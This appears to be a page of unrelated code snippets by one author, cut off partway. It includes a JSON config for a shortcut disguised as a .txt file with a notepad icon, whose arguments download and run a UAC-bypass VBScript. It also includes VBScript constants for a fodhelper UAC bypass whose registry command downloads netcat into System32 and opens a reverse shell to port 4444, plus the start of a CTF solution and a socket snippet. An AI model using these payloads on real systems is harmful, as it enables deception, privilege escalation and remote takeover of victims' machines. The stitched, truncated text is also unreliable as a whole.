tommelo

{
    "shortcut": {
        "target_path": "C:\\Windows\\System32\\cmd.exe",
        "working_dir": "C:\\Windows\\System32",
        "arguments": "/c powershell.exe iwr -outf %tmp%\\p.vbs http://127.0.0.1/uac_bypass.vbs & %tmp%\\p.vbs",
        "icon_path": "C:\\Windows\\System32\\notepad.exe",
        "icon_index": null,
        "window_style": "MINIMIZED",
        "description": "TRUST ME",
        "fake_extension": ".txt",

tommelo

Const HKEY_CURRENT_USER = &H80000001

Const FodHelperPath           = "C:\\Windows\\System32\\fodhelper.exe"
Const RegKeyPathStr           = "SOFTWARE\\Classes\\ms-settings\\shell\\open\\command"
Const RegKeyPath              = "Software\\Classes\\ms-settings\\shell\\open\\command"
Const DelegateExecRegKeyName  = "DelegateExecute"
Const DelegateExecRegKeyValue = ""
Const DefaultRegKeyName       = ""
Const DefaultRegKeyValue      = "cmd.exe /c powershell.exe -nop -w hidden iwr -outf C:\Windows\System32\nc.exe http://127.0.0.1/nc.exe & C:\Windows\System32\nc.exe 127.0.0.1 4444 -e cmd.exe"

tommelo

#!/usr/bin/env python
# -*- coding: utf-8; mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vim: fileencoding=utf-8 tabstop=4 expandtab shiftwidth=4
# pylint: disable=C0103,C0301,W1202,W0212

"""
Hackaflag Garage Week (Bradesco)
Resolução do desafio da pirâmide:

HOST: 159.65.181.58 

tommelo

const { connect } = require('./socket');

async function asyncSocket() {
  let socket;
  
  try {
    
    socket = await connect('localhost', 3000, 30);
    
    await socket.write('ping');